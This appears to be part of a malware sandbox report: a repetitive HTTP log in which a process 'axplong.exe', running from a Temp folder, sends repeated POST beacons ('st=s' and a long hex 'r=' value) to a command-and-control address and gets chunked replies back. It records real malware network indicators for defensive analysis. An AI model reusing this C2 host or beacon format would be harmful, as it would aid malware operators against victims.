                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:25.865909100 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:26.091207027 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.462779185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:26.203278065 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:26.896487951 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:26.897238016 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:27.120228052 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.462780185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:27.236238956 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:27.977377892 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:27.991801977 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:28.227736950 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.462781185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:28.344547987 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:29.044981956 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:29.089663029 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:29.317178011 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.462782185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:29.593097925 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:30.302067041 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:30.302994013 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:30.535983086 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.462783185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:30.655736923 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:31.391613960 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:31.394906044 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:31.632481098 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.462784185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:31.757313967 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:32.466902018 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:32.468005896 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:32.697851896 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.462785185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:32.812783003 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:33.505606890 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:33.506508112 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:33.729070902 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.462786185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:33.843513012 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:34.536292076 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:34.537298918 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:34.759916067 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.462787185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:34.874448061 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:35.564917088 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:35.566376925 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:35.790292025 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.462788185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:35.906795979 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:36.805506945 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:36.806343079 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:37.041392088 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.462789185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:37.190538883 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:37.904227972 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:37.904932022 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
